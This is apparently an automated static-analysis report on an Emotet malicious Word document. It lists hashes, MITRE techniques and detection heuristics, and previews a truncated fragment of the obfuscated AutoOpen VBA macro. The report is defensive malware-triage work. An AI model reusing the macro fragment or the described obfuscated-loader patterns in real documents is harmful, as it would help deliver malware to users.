Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 224509a067237c28…

MALICIOUS

Office (OLE)

Size: 121.7 KB
First seen: 2017-11-20
MD5: b11f67cc68c4974bb2b4a8abc58111a7
SHA-1: 98910e2933a1e24e1a66eef282c3a8385290269c
SHA-256: 224509a067237c28dc8873c39446e2cb3f9888e45e8001460157d9cd808319dc
Risk score: 304

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro uses the Shell() function to execute a payload, and ClamAV identifies it as Emotet. The script attempts to download a second-stage payload from a URL that is only partially visible in the source because it is reconstructed at run time from concatenated strings.

Heuristics (9)

  • ClamAV: Doc.Macro.Emotet-6374344-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 94178 bytes
SHA-256: 884d668bbf07f9aa52a50f7487793b6635e3c4966425fa69b35574ebbba04a24
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 44 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NLinQt"
Sub AutoOpen()
XLGGNzq = "JuAbFcd" + "VcJtRQG" + "PpfhIpb" + "SbiYOtD"
MVXMiPIMF
bPIsvii = "YquzMcS" + "MkjkuUH" + "WaZEKPq" + "SSCqiau"
End Sub
... (truncated)